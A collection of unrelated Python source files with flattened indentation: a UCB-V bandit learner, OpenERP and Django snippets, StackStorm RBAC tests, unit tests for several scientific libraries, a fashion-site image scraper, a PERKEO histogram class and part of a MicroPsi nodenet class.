At time :math:`t`, play arm
.. math::
\mathrm{argmax}_{i \in [0, N-1]} \left\{ \hat{\mu}_i(t) + \sqrt{ \frac{ 2
\hat{V}_i(t) \ln(t) }{T_i(t)} }+ \frac{ b \ln(t) }{T_i(t)} \right\}
.. note::
Reward has to be bounded within :math:`[0, b]`.
"""
def __init__(self, arm_num: int, horizon: int,
name: str = None, b: float = 1.0):
"""
Args:
arm_num: number of arms
horizon: total number of time steps
name: alias name
b: upper bound of reward
"""
super().__init__(arm_num=arm_num, horizon=horizon, name=name)
if b <= 0:
raise Exception('%s: b is set to %.2f which is no greater than 0!' %
(self.name, b))
self.__b = b
def _name(self) -> str:
"""
Returns:
default learner name
"""
return 'ucbv'
def reset(self):
"""Reset the learner
.. warning::
This function should be called before the start of the game.
"""
self.__pseudo_arms = [PseudoArm() for arm_id in range(self.arm_num())]
# current time step
self.__time = 1
def UCBV(self) -> np.ndarray:
"""
Returns:
optimistic estimate of arms' real means using empirical variance
"""
ucbv = [
arm.em_mean +
np.sqrt(2 * arm.em_var * np.log(self.__time) / arm.total_pulls()) +
self.__b * np.log(self.__time) / arm.total_pulls()
for arm in self.__pseudo_arms
]
return ucbv
def actions(self, context=None) -> Optional[List[Tuple[int, int]]]:
"""
Args:
context: context of the ordinary bandit which should be `None`
Returns:
arms to pull
"""
del context
if self.__time > self.horizon():
self.__last_actions = None
elif self.__time <= self.arm_num():
self.__last_actions = [((self.__time - 1) % self.arm_num(), 1)]
else:
self.__last_actions = [(np.argmax(self.UCBV()), 1)]
return self.__last_actions
def update(self, feedback: List[Tuple[np.ndarray, None]]):
"""Learner update
Args:
feedback: feedback returned by the bandit environment by executing
:func:`actions`
"""
self.__pseudo_arms[self.__last_actions[0][0]].update(feedback[0][0])
self.__time += 1
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import fields, osv
from openerp.osv.orm import browse_record, browse_null
from openerp.tools.translate import _
class purchase_requisition_partner(osv.osv_memory):
_name = "purchase.requisition.partner"
_description = "Purchase Requisition Partner"
_columns = {
'partner_id': fields.many2one('res.partner', 'Supplier', required=True,domain=[('supplier', '=', True)]),
}
def view_init(self, cr, uid, fields_list, context=None):
if context is None:
context = {}
res = super(purchase_requisition_partner, self).view_init(cr, uid, fields_list, context=context)
record_id = context and context.get('active_id', False) or False
tender = self.pool.get('purchase.requisition').browse(cr, uid, record_id, context=context)
if not tender.line_ids:
raise osv.except_osv(_('Error!'), _('No Product in Tender.'))
return res
def create_order(self, cr, uid, ids, context=None):
active_ids = context and context.get('active_ids', [])
data = self.browse(cr, uid, ids, context=context)[0]
self.pool.get('purchase.requisition').make_purchase_order(cr, uid, active_ids, data.partner_id.id, context=context)
return {'type': 'ir.actions.act_window_close'}
purchase_requisition_partner()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
# Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from six.moves import http_client
import st2common.validators.api.action as action_validator
from st2common.models.db.auth import UserDB
from st2common.persistence.auth import User
from st2common.models.db.rbac import RoleDB
from st2common.models.db.rbac import UserRoleAssignmentDB
from st2common.persistence.rbac import UserRoleAssignment
from st2common.persistence.rbac import Role
from st2common.transport.publishers import PoolPublisher
from tests.base import APIControllerWithRBACTestCase
from tests.base import BaseActionExecutionControllerTestCase
from st2tests.fixturesloader import FixturesLoader
FIXTURES_PACK = 'generic'
TEST_FIXTURES = {
'runners': ['testrunner1.yaml'],
'actions': ['action1.yaml', 'local.yaml']
}
@mock.patch.object(PoolPublisher, 'publish', mock.MagicMock())
class ActionExecutionRBACControllerTestCase(BaseActionExecutionControllerTestCase,
APIControllerWithRBACTestCase):
fixtures_loader = FixturesLoader()
@mock.patch.object(action_validator, 'validate_action', mock.MagicMock(
return_value=True))
def setUp(self):
super(ActionExecutionRBACControllerTestCase, self).setUp()
self.fixtures_loader.save_fixtures_to_db(fixtures_pack=FIXTURES_PACK,
fixtures_dict=TEST_FIXTURES)
# Insert mock users, roles and assignments
# Users
user_1_db = UserDB(name='multiple_roles')
user_1_db = User.add_or_update(user_1_db)
self.users['multiple_roles'] = user_1_db
# Roles
roles = ['role_1', 'role_2', 'role_3']
for role in roles:
role_db = RoleDB(name=role)
Role.add_or_update(role_db)
# Role assignments
user_db = self.users['multiple_roles']
role_assignment_db = UserRoleAssignmentDB(
user=user_db.name,
role='admin',
source='assignments/%s.yaml' % user_db.name)
UserRoleAssignment.add_or_update(role_assignment_db)
for role in roles:
role_assignment_db = UserRoleAssignmentDB(
user=user_db.name,
role=role,
source='assignments/%s.yaml' % user_db.name)
UserRoleAssignment.add_or_update(role_assignment_db)
def test_post_rbac_info_in_context_success(self):
# When RBAC is enabled, additional RBAC related info should be included in action_context
data = {
'action': 'wolfpack.action-1',
'parameters': {
'actionstr': 'foo'
}
}
# User with one role assignment
user_db = self.users['admin']
self.use_user(user_db)
resp = self._do_post(data)
self.assertEqual(resp.status_int, 201)
expected_context = {
'pack': 'wolfpack',
'user': 'admin',
'rbac': {
'user': 'admin',
'roles': ['admin']
}
}
self.assertEqual(resp.json['context'], expected_context)
# User with multiple role assignments
user_db = self.users['multiple_roles']
self.use_user(user_db)
resp = self._do_post(data)
self.assertEqual(resp.status_int, 201)
expected_context = {
'pack': 'wolfpack',
'user': 'multiple_roles',
'rbac': {
'user': 'multiple_roles',
'roles': ['admin', 'role_1', 'role_2', 'role_3']
}
}
self.assertEqual(resp.json['context'], expected_context)
def test_get_all_limit_minus_one(self):
user_db = self.users['observer']
self.use_user(user_db)
resp = self.app.get('/v1/actionexecutions?limit=-1', expect_errors=True)
self.assertEqual(resp.status_code, http_client.FORBIDDEN)
user_db = self.users['admin']
self.use_user(user_db)
resp = self.app.get('/v1/actionexecutions?limit=-1')
self.assertEqual(resp.status_code, http_client.OK)
|
#!/usr/bin/env python
import twder
import unittest
import datetime
class TestStringMethods(unittest.TestCase):
def all_element_is_str(self, container):
for e in container:
self.assertIsInstance(e, str)
def check_range_result(self, range_result):
self.assertIsInstance(range_result, list)
map(self.all_element_is_str, range_result)
def test_currencies(self):
ret = twder.currencies()
self.assertIsInstance(ret, list)
self.all_element_is_str(ret)
def test_currency_name_dict(self):
ret = twder.currency_name_dict()
currencies = twder.currencies()
for c in currencies:
self.assertIn(c, ret)
self.assertIsInstance(ret[c], str)
def test_now_all(self):
twder.now_all()
def test_now(self):
ret = twder.now("JPY")
self.assertIsInstance(ret, tuple)
self.all_element_is_str(ret)
def test_pastday(self):
ret = twder.past_day("JPY")
self.check_range_result(ret)
def test_past_six_month(self):
ret = twder.past_six_month("JPY")
self.check_range_result(ret)
def test_specify_month(self):
now = datetime.datetime.now() - datetime.timedelta(days=31)
ret = twder.specify_month("JPY", now.year, now.month)
self.check_range_result(ret)
if __name__ == "__main__":
unittest.main()
|
from django.contrib import admin
from .models import LearningResources
@admin.register(LearningResources)
class ArticleAdmin(admin.ModelAdmin):
list_display = ['title', 'order', 'url', 'desc']
list_editable = ['order']
|
"""
.. module:: test_datautil
:synopsis: Unit tests for datautil module
"""
import pytest
import numpy as np
import collections as cl
import nutsml.datautil as util
from nutsflow.common import StableRandom
@pytest.fixture(scope="function")
def sampleset():
"""Return list with 50 positive and 10 negative samples"""
pos = [(0, i) for i in range(50)]
neg = [(1, i) for i in range(10)]
return pos + neg
def test_isnan():
assert not util.isnan(1)
assert not util.isnan(0)
assert util.isnan(np.NaN)
def test_istensor():
assert util.istensor(np.zeros((2, 3)))
assert not util.istensor([1, 2])
def test_shapestr():
assert util.shapestr(np.array([1, 2])) == '2'
assert util.shapestr(np.zeros((3, 4))) == '3x4'
assert util.shapestr(np.zeros((3, 4), dtype='uint8'), True) == '3x4:uint8'
def test_stype():
a = np.zeros((3, 4), dtype='uint8')
b = np.zeros((1, 2), dtype='float32')
assert util.stype(1.1) == '<float> 1.1'
assert util.stype([1, 2]) == '[<int> 1, <int> 2]'
assert util.stype((1, 2)) == '(<int> 1, <int> 2)'
assert util.stype({1, 2}) == '{<int> 1, <int> 2}'
assert util.stype([1, (2, 3.1)]) == '[<int> 1, (<int> 2, <float> 3.1)]'
assert util.stype(a) == '<ndarray> 3x4:uint8'
assert util.stype(b) == '<ndarray> 1x2:float32'
expect = '[<ndarray> 3x4:uint8, [<ndarray> 1x2:float32]]'
assert util.stype([a, [b]]) == expect
expect = '[[<ndarray> 3x4:uint8], [<ndarray> 1x2:float32]]'
assert util.stype([[a], [b]]) == expect
expect = '{a:<ndarray> 3x4:uint8, b:<ndarray> 1x2:float32}'
assert util.stype({'a': a, 'b': b}) == expect
def test_batchstr():
a = np.zeros((3, 4), dtype='uint8')
b = np.zeros((1, 2, 2), dtype='float16')
assert util.batchstr([a]) == '[3x4:uint8]'
assert util.batchstr([a, b]) == '[3x4:uint8, 1x2x2:float16]'
assert util.batchstr([a, b], False) == '[3x4, 1x2x2]'
def test_random_upsample(sampleset):
samples = [('pos', 1), ('pos', 1), ('neg', 0)]
stratified = sorted(util.upsample(samples, 1, rand=StableRandom(0)))
assert stratified == [('neg', 0), ('neg', 0), ('pos', 1), ('pos', 1)]
stratified1 = util.upsample(sampleset, 0, rand=StableRandom(0))
_, labelcnts = util.group_samples(stratified1, 0)
assert labelcnts == {0: 50, 1: 50}
stratified2 = util.upsample(sampleset, 0, rand=StableRandom(1))
assert stratified1 != stratified2, 'Order should be random'
def test_random_downsample(sampleset):
samples = [('pos', 1), ('pos', 1), ('neg', 0)]
stratified = sorted(
util.random_downsample(samples, 1, rand=StableRandom(0)))
assert stratified == [('neg', 0), ('pos', 1)]
stratified1 = util.random_downsample(sampleset, 0, rand=StableRandom(0))
_, labelcnts = util.group_samples(stratified1, 0)
assert labelcnts == {0: 10, 1: 10}
stratified2 = util.random_downsample(sampleset, 0, rand=StableRandom(1))
assert stratified1 != stratified2, 'Order should be random'
def test_group_samples():
samples = [('pos', 1), ('pos', 1), ('neg', 0)]
groups, labelcnts = util.group_samples(samples, 1)
assert groups == {0: [('neg', 0)], 1: [('pos', 1), ('pos', 1)]}
assert labelcnts == cl.Counter({1: 2, 0: 1})
def test_group_by():
is_odd = lambda e: bool(e % 2)
numbers = [0, 1, 2, 3, 4]
assert util.group_by(numbers, is_odd) == {False: [0, 2, 4], True: [1, 3]}
assert util.group_by([1, 3], is_odd) == {True: [1, 3]}
assert util.group_by([], is_odd) == dict()
def test_col_map():
sample = (1, 2, 3)
add_n = lambda x, n: x + n
assert util.col_map(sample, 1, add_n, 10) == (1, 12, 3)
assert util.col_map(sample, (0, 2), add_n, 10) == (11, 2, 13)
def test_shuffle_sublists():
sublists = [[1, 2, 3], [4, 5, 6, 7]]
util.shuffle_sublists(sublists, StableRandom(0))
assert sublists == [[1, 3, 2], [4, 5, 7, 6]]
|
#! /usr/bin/env python
"""
Unit tests for landlab.collections
"""
import pytest
from landlab import Arena, Implements, ImplementsOrRaise, NoProvidersError, Palette
from landlab.framework.interfaces import BmiBase, BmiNoGrid
@Implements(BmiBase)
class Sample1(object):
"""A sample component."""
__implements__ = (BmiBase, BmiNoGrid)
_input_var_names = ["air__temperature", "surface__elevation"]
_output_var_names = ["deposition__rate"]
model_name = "Sample 1"
author_name = "Eric Hutton"
version = "0.1"
time_units = "s"
time_step_type = "fixed"
step_method = "explicit"
grid_type = "none"
_vars = {"deposition__rate": [1.]}
def initialize(self, name):
pass
def update(self):
pass
def finalize(self):
pass
def get_input_var_names(self):
return self._input_var_names
def get_output_var_names(self):
return self._output_var_names
def get_var_rank(self, name):
return 0
def get_start_time(self):
return 0.
def get_current_time(self):
return 0.
def get_end_time(self):
return 100.
def get_time_step(self):
return 1.
def get_var_type(self, name):
return "float64"
def get_var_units(self, name):
return "m"
def set_value(self, name, value):
pass
def get_value(self, name):
return self._vars[name]
@ImplementsOrRaise(BmiBase)
class Sample2(object):
"""A sample component."""
__implements__ = (BmiBase, BmiNoGrid)
_input_var_names = ["deposition__rate"]
_output_var_names = ["air__temperature", "surface__elevation"]
model_name = "Sample 2"
author_name = "Eric Hutton"
version = "0.1"
time_units = "s"
time_step_type = "fixed"
step_method = "explicit"
grid_type = "none"
_vars = {"air__temperature": [1.], "surface__elevation": [1.]}
def initialize(self, name):
pass
def update(self):
pass
def finalize(self):
pass
def get_input_var_names(self):
return self._input_var_names
def get_output_var_names(self):
return self._output_var_names
def get_var_rank(self, name):
return 0
def get_start_time(self):
return 0.
def get_current_time(self):
return 0.
def get_end_time(self):
return 100.
def get_time_step(self):
return 1.
def get_var_type(self, name):
return "float64"
def get_var_units(self, name):
return "m"
def get_value(self, name):
return self._vars[name]
def set_value(self, name, value):
pass
def test_empty_palette():
"""Create a palette without components."""
palette = Palette()
assert len(palette) == 0
assert list(palette.list()) == []
assert list(palette.keys()) == []
assert palette.uses() == []
assert palette.provides() == []
providers = palette.find_provider("air__temperature")
assert providers == []
users = palette.find_user("air__temperature")
assert users == []
connections = palette.find_connections()
assert connections == {}
def test_1_component_create():
palette = Palette(sample=Sample1)
assert len(palette) == 1
def test_1_component_dict_interface():
palette = Palette(sample=Sample1)
assert dict(sample=Sample1) == palette
assert len(palette) == 1
assert list(palette.keys()) == ["sample"]
assert list(palette.values()) == [Sample1]
items = list(palette.items())
assert ("sample", Sample1) == items[0]
def test_1_component_list():
palette = Palette(sample=Sample1)
assert ["sample"] == list(palette.list())
def test_1_component_uses():
palette = Palette(sample=Sample1)
uses = palette.uses()
uses.sort()
assert ["air__temperature", "surface__elevation"] == uses
def test_1_component_provides():
palette = Palette(sample=Sample1)
provides = palette.provides()
provides.sort()
assert ["deposition__rate"] == provides
def test_1_component_find_providers():
palette = Palette(sample=Sample1)
providers = palette.find_provider("air__temperature")
assert providers == []
providers = palette.find_provider("deposition__rate")
assert providers == ["sample"]
def test_1_component_find_users():
palette = Palette(sample=Sample1)
users = palette.find_user("air__temperature")
assert users == ["sample"]
def test_1_component_find_connections():
palette = Palette(sample=Sample1)
with pytest.raises(NoProvidersError):
palette.find_connections()
def test_2_components_create():
palette = Palette(one=Sample1, two=Sample2)
assert len(palette) == 2
def test_2_components_dict_interface():
palette = Palette(one=Sample1, two=Sample2)
assert dict(one=Sample1, two=Sample2) == palette
assert len(palette) == 2
keys = list(palette.keys())
keys.sort()
assert ["one", "two"] == keys
values = palette.values()
assert 2 == len(values)
assert Sample1 in values and Sample2 in values
items = list(palette.items())
items.sort()
assert 2 == len(items)
assert ("one", Sample1) == items[0]
assert ("two", Sample2) == items[1]
def test_2_components_list():
palette = Palette(one=Sample1, two=Sample2)
components = list(palette.list())
components.sort()
assert ["one", "two"] == components
def test_2_components_uses():
palette = Palette(one=Sample1, two=Sample2)
uses = palette.uses()
uses.sort()
assert ["air__temperature", "deposition__rate", "surface__elevation"] == uses
def test_2_components_provides():
palette = Palette(one=Sample1, two=Sample2)
provides = palette.provides()
provides.sort()
assert ["air__temperature", "deposition__rate", "surface__elevation"] == provides
def test_2_components_find_providers():
palette = Palette(one=Sample1, two=Sample2)
providers = palette.find_provider("air__temperature")
assert ["two"] == providers
providers = palette.find_provider("deposition__rate")
assert ["one"] == providers
def test_2_components_find_users():
palette = Palette(one=Sample1, two=Sample2)
users = palette.find_user("air__temperature")
assert ["one"] == users
def test_2_components_find_connections():
palette = Palette(one=Sample1, two=Sample2)
connections = {
"one": {"deposition__rate": ["two"]},
"two": {"air__temperature": ["one"], "surface__elevation": ["one"]},
}
assert connections == palette.find_connections()
def test_arena_instantiate():
arena = Arena()
assert dict() == arena
arena.instantiate(Sample1, "one")
assert 1 == len(arena)
assert "one" in arena
assert isinstance(arena["one"], Sample1)
arena.instantiate(Sample2, "two")
assert 2 == len(arena)
assert "one" in arena and "two" in arena
assert isinstance(arena["one"], Sample1)
assert isinstance(arena["two"], Sample2)
def test_arena_connect():
arena = Arena()
arena.instantiate(Sample1, "one")
arena.instantiate(Sample2, "two")
arena.connect("one", "two", "air__temperature")
arena.connect("one", "two", "surface__elevation")
arena.connect("two", "one", "deposition__rate")
arena["one"].get_value("deposition__rate")
arena["two"].get_value("air__temperature")
arena["two"].get_value("surface__elevation")
def test_arena_walk():
arena = Arena()
arena.instantiate(Sample1, "one")
arena.instantiate(Sample2, "two")
arena.connect("one", "two", "air__temperature")
arena.connect("one", "two", "surface__elevation")
arena.connect("two", "one", "deposition__rate")
tree = arena.walk("one")
assert ["one", "two"] == tree
|
__author__ = 'jie'
import sys
from initialization import initAppWithGui
def main(args):
app = initAppWithGui(args)
sys.exit(app.exec_())
if __name__ == '__main__':
main(sys.argv)
|
#== __init__.py ==#
from .main import GHClient
__title__ = 'GitHubAPI'
__author__ = 'sudosnok'
__version__ = '0.0.1'
|
from multiprocessing import freeze_support
from fashionscrapper.brand.asos.helper.database.dbhelper import list_dbs_by_category
from fashionscrapper.brand.hm.HM import HM
from fashionscrapper.brand.hm.consts.parser import *
from fashionscrapper.brand.hm.helper.download.HMPaths import HMPaths
from fashionscrapper.brand.hm.helper.download.HM_DownloadHelper import HM_DownloadHelper
from fashionscrapper.utils.web.dynamic import driver as d_driver
unknown_category_allowed=False
#def prepare_categories(category_jobs):
# def load_category(cat_data):
# category_name, category_url = cat_data
# with d_driver(headless=False) as driver:
# hm = HM(driver=driver, logger=logger)
# logger.debug("Loading" + category_url)
# items = hm.list_category(category_url, PAGINATE=PAGINATE)
# return [{"category": {"name": category_name, "url": category_url, "items": [x]}} for x in items]
# categories_data = []
# with Pool(THREADS) as p:
# r = p.map(load_category, tqdm(category_jobs, desc=f"i) List Cat. {THREADS} Threads", total=len(category_jobs)))
# categories_data.append(r)
# return flatten(categories_data)
def prepare_categories(dl_helper):
with d_driver(headless=False) as driver:
category_jobs_ = HM(driver=driver).list_categories_group_by_name()
assert len(category_jobs_) > 0
exceptions = dl_helper.prepare_categories(category_jobs_)
for exceptions in exceptions:
if len(exceptions) > 0:
print(exceptions)
print("")
def prepare_articles(dl_helper):
categories_db_path = HMPaths(BASE_PATH).get_category_db_base_path()
categories_db = list_dbs_by_category(db_base_Path=categories_db_path, CATEGORIES=CATEGORIES,
unknown_category_allowed=unknown_category_allowed)
dl_helper.prepare_articles(categories_db)
def download_images(dl_helper):
entries_db_path = HMPaths(BASE_PATH).get_entries_db_base_path()
entries_db = list_dbs_by_category(db_base_Path=entries_db_path, CATEGORIES=CATEGORIES,
unknown_category_allowed=unknown_category_allowed)
exceptions = dl_helper.download_images(entries_db)
exceptions = list(filter(lambda x: x, exceptions))
for url, dst, exception in exceptions:
print(url, exception)
print("Len Excp", len(exceptions))
def describe_results(dl_helper):
results = dl_helper.describe_results()
for key, value in results.items():
print(key)
#print(max(len(key), len(value)) * "v")
print(value)
#print(max(len(key), len(value)) * "-")
print("-" * 16)
if __name__ == "__main__":
freeze_support()
dl_helper = HM_DownloadHelper(**dl_settings)
prepare_categories(dl_helper)
prepare_articles(dl_helper)
download_images(dl_helper)
describe_results(dl_helper)
|
""""""
from __future__ import annotations
import os
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from matplotlib.pyplot import figure
from panter.data.dataMisc import ret_hist
output_path = os.getcwd()
plt.rcParams.update({"font.size": 12})
bfound_root = True
try:
from ROOT import TFile, TH1F
except ModuleNotFoundError:
bfound_root = False
class HistPerkeo:
"""Histogram object for use with PERKEO data.
Takes data and histogram parameters to create a histogram with
basic helper functions.
Parameters
----------
data : np.array
bin_count, low_lim, up_lim: int
Histogram parameters: Bin count, upper and lower limit
Attributes
----------
stats
parameters
see above section
hist : pd.DataFrame
Returned histogram from function ret_hist()
Examples
--------
Create a histogram with any np.array of data and plot the result:
>>> histogram = HistPerkeo(data=data_array, bin_count=10, low_lim=-10, up_lim=10)
>>> histogram.plot_hist()
"""
def __init__(
self,
data: np.array(float),
bin_count: int = 1024,
low_lim: int = 0,
up_lim: int = 52000,
):
assert low_lim <= up_lim, "Error: lower limit bigger than upper limit."
self._data = np.asarray(data)
if self._data.shape != ():
self.n_events = self._data.shape[0]
self.mean = self._data.mean()
self.stdv = self._data.std()
self.stats = {
"mean": self.mean,
"std": self.stdv,
"noevents": self.n_events,
}
self.parameters = {"bin_count": bin_count, "low_lim": low_lim, "up_lim": up_lim}
self.bin_count = bin_count
self.up_lim = up_lim
self.low_lim = low_lim
self.bin_width = (self.up_lim - self.low_lim) / self.bin_count
if self._data.shape != ():
self.hist = ret_hist(self._data, **self.parameters)
else:
self.hist = None
self.integral = (self.hist["y"] * self.bin_width).sum()
def _calc_stats(self):
"""Calculate mean and biased variance of histogram based on bin content."""
self.n_events = self.hist["y"].sum()
self.mean = (self.hist["x"] * self.hist["y"]).sum() / self.n_events
var = ((self.hist["x"] - self.mean) ** 2 * self.hist["y"]).sum() / self.n_events
self.stdv = np.sqrt(var)
self.stats = {
"mean": self.mean,
"std": self.stdv,
"noevents": self.n_events,
}
self.integral = (self.hist["y"] * self.bin_width).sum()
def plot_hist(
self,
rng: list = None,
title: str = "",
xlabel: str = "",
ylabel: str = "",
bsavefig: bool = False,
filename: str = "",
):
"""Plot histogram."""
figure(figsize=(8, 6))
plt.errorbar(self.hist["x"], self.hist["y"], self.hist["err"], fmt=".")
if rng is not None:
plt.axis([rng[0], rng[1], rng[2], rng[3]])
if self.stats["std"] is None:
self.stats["std"] = 0.0
plt.title(title)
plt.ylabel(ylabel)
plt.xlabel(xlabel)
plt.annotate(
f"Mean = {self.stats['mean']:0.2f}\n" f"StDv = {self.stats['std']:0.2f}",
xy=(0.05, 0.95),
xycoords="axes fraction",
ha="left",
va="top",
bbox=dict(boxstyle="round", fc="1"),
)
if bsavefig:
if filename == "":
filename = "histperkeo"
plt.savefig(f"{output_path}/{filename}.png", dpi=300)
plt.show()
def addhist(self, hist_p: HistPerkeo, fac: float = 1.0):
"""Add another histogram to existing one with multiplicand."""
assert self.parameters == hist_p.parameters, "ERROR: Binning does not match."
newhist = pd.DataFrame(
{
"x": self.hist["x"],
"y": (self.hist["y"] + fac * hist_p.hist["y"]),
"err": np.sqrt(self.hist["err"] ** 2 + (fac * hist_p.hist["err"]) ** 2),
}
)
# Changes input ret_hist like in Root
self.hist = newhist
self._calc_stats()
def divbyhist(self, hist_p: HistPerkeo):
"""Divide by another histogram."""
assert self.parameters == hist_p.parameters, "ERROR: Binning does not match."
filt = hist_p.hist["y"] != 0.0
hist_p.hist = hist_p.hist[filt]
self.hist = self.hist[filt]
newhist = pd.DataFrame(
{
"x": self.hist["x"],
"y": (self.hist["y"] / hist_p.hist["y"]),
"err": np.sqrt(
(self.hist["err"] / hist_p.hist["y"]) ** 2
+ (self.hist["err"] * hist_p.hist["err"] / (hist_p.hist["y"] ** 2))
** 2
),
}
)
# Changes input ret_hist like in Root
self.hist = newhist
self._calc_stats()
def scal(self, fac: float):
"""Scale histogram by a factor."""
newhist = pd.DataFrame(
{
"x": self.hist["x"],
"y": (self.hist["y"] * fac),
"err": np.sqrt((fac * self.hist["err"]) ** 2),
}
)
# Changes input ret_hist like in Root
self.hist = newhist
self._calc_stats()
def ret_asnumpyhist(self):
"""Return histogram in np.histogram format from current histogram.
Note: Cannot use data, as this doesnt include added histograms etc."""
deltx = 0.5 * (self.hist["x"].values[1] - self.hist["x"].values[0])
binedge = self.hist["x"].values - deltx
binedge = np.append(binedge, self.hist["x"].values[-1] + deltx)
return self.hist["y"].values, binedge
def write2root(
self, histname: str, filename: str, out_dir: str = None, bupdate: bool = False
):
"""Write the histogram into a root file."""
assert bfound_root, "ERROR: Could not find ROOT package."
if out_dir is None:
out_dir = output_path
opt = "UPDATE" if bupdate else "RECREATE"
hfile = TFile(f"{out_dir}/{filename}.root", opt, "Panter Output")
rhist = TH1F(
f"{histname}",
f"{histname}",
self.parameters["bin_count"],
self.parameters["low_lim"],
self.parameters["up_lim"],
)
for i in range(1, rhist.GetNbinsX()):
rhist.SetBinContent(i, self.hist["y"][i - 1])
rhist.SetBinError(i, self.hist["err"][i - 1])
rhist.Draw()
hfile.Write()
return 0
|
__author__ = 'rvuine'
import json
import os
from micropsi_core.tools import post_mortem
from micropsi_core.nodenet import monitor
from micropsi_core.nodenet.node import Nodetype
from micropsi_core.nodenet.nodenet import Nodenet, NODENET_VERSION
from micropsi_core.nodenet.stepoperators import DoernerianEmotionalModulators
from .dict_stepoperators import DictPropagate, DictCalculate
from .dict_node import DictNode
from .dict_nodespace import DictNodespace
import copy
STANDARD_NODETYPES = {
"Comment": {
"name": "Comment",
"symbol": "#",
'parameters': ['comment'],
"shape": "Rectangle"
},
"Neuron": {
"name": "Neuron",
"slottypes": ["gen"],
"nodefunction_name": "neuron",
"gatetypes": ["gen"]
},
"Sensor": {
"name": "Sensor",
"parameters": ["datasource"],
"nodefunction_name": "sensor",
"gatetypes": ["gen"]
},
"Actuator": {
"name": "Actuator",
"parameters": ["datatarget"],
"nodefunction_name": "actuator",
"slottypes": ["gen"],
"gatetypes": ["gen"]
},
"Concept": {
"name": "Concept",
"slottypes": ["gen"],
"nodefunction_name": "concept",
"gatetypes": ["gen", "por", "ret", "sub", "sur", "cat", "exp", "sym", "ref"]
},
"Script": {
"name": "Script",
"slottypes": ["gen", "por", "ret", "sub", "sur"],
"nodefunction_name": "script",
"gatetypes": ["gen", "por", "ret", "sub", "sur", "cat", "exp", "sym", "ref"]
},
"Pipe": {
"name": "Pipe",
"slottypes": ["gen", "por", "ret", "sub", "sur", "cat", "exp"],
"nodefunction_name": "pipe",
"gatetypes": ["gen", "por", "ret", "sub", "sur", "cat", "exp"],
"parameters": ["expectation", "wait"],
"symbol": "πp",
"shape": "Rectangle",
"parameter_defaults": {
"expectation": 1,
"wait": 10
}
},
"Activator": {
"name": "Activator",
"slottypes": ["gen"],
"parameters": ["type"],
"parameter_values": {"type": ["por", "ret", "sub", "sur", "cat", "exp", "sym", "ref", "sampling"]},
"nodefunction_name": "activator"
},
"LSTM": {
"name": "LSTM",
"slottypes": ["gen", "por", "gin", "gou", "gfg"],
"gatetypes": ["gen", "por", "gin", "gou", "gfg"],
"nodefunction_name": "lstm",
}
}
class DictNodenet(Nodenet):
"""Main data structure for MicroPsi agents,
Contains the net entities and runs the activation spreading. The nodenet stores persistent data.
Attributes:
state: a dict of persistent nodenet data; everything stored within the state can be stored and exported
uid: a unique identifier for the node net
name: an optional name for the node net
nodespaces: a dictionary of node space UIDs and respective node spaces
nodes: a dictionary of node UIDs and respective nodes
links: a dictionary of link UIDs and respective links
gate_types: a dictionary of gate type names and the individual types of gates
slot_types: a dictionary of slot type names and the individual types of slots
node_types: a dictionary of node type names and node type definitions
world: an environment for the node net
worldadapter: an actual world adapter object residing in a world implementation, provides interface
owner: an id of the user who created the node net
step: the current calculation step of the node net
"""
@property
def engine(self):
return "dict_engine"
@property
def current_step(self):
return self._step
@property
def worldadapter_instance(self):
return self._worldadapter_instance
@worldadapter_instance.setter
def worldadapter_instance(self, _worldadapter_instance):
self._worldadapter_instance = _worldadapter_instance
if self._worldadapter_instance:
for uid, node in self._nodes.items():
# re-set parameters to filter for available datasources/-targets
if node.type == "Sensor":
node.set_parameter('datasource', node.get_parameter('datasource'))
if node.type == "Actuator":
node.set_parameter('datatarget', node.get_parameter('datatarget'))
self._worldadapter_instance.nodenet = self
def __init__(self, persistency_path, name="", worldadapter="Default", world=None, owner="", uid=None, native_modules={}, use_modulators=True, worldadapter_instance=None, version=None):
"""Create a new MicroPsi agent.
Arguments:
agent_type (optional): the interface of this agent to its environment
name (optional): the name of the agent
owner (optional): the user that created this agent
uid (optional): unique handle of the agent; if none is given, it will be generated
"""
super().__init__(persistency_path, name, worldadapter, world, owner, uid, native_modules=native_modules, use_modulators=use_modulators, worldadapter_instance=worldadapter_instance, version=version)
try:
import numpy
self.numpy_available = True
except ImportError:
self.numpy_available = False
self.nodetypes = {}
for type, data in STANDARD_NODETYPES.items():
self.nodetypes[type] = Nodetype(nodenet=self, **data)
self._nodes = {}
self._nodespaces = {}
self._last_assigned_node_id = 0
self.nodegroups = {}
self.initialize_nodenet({})
def initialize_stepoperators(self):
self.stepoperators = [DictPropagate(), DictCalculate()]
if self.use_modulators:
self.stepoperators.append(DoernerianEmotionalModulators())
self.stepoperators.sort(key=lambda op: op.priority)
def get_data(self, **params):
data = super().get_data(**params)
data['nodes'] = self.construct_nodes_dict(**params)
data['nodespaces'] = self.construct_nodespaces_dict("Root", transitive=True)
data['modulators'] = self.construct_modulators_dict()
data['last_assigned_node_id'] = self._last_assigned_node_id
return data
def export_json(self):
data = self.get_data(complete=True, include_links=False)
data['links'] = self.construct_links_list()
return data
def get_links_for_nodes(self, node_uids):
source_nodes = [self.get_node(uid) for uid in node_uids]
links = {}
nodes = {}
for node in source_nodes:
nodelinks = node.get_associated_links()
for l in nodelinks:
links[l.signature] = l.get_data(complete=True)
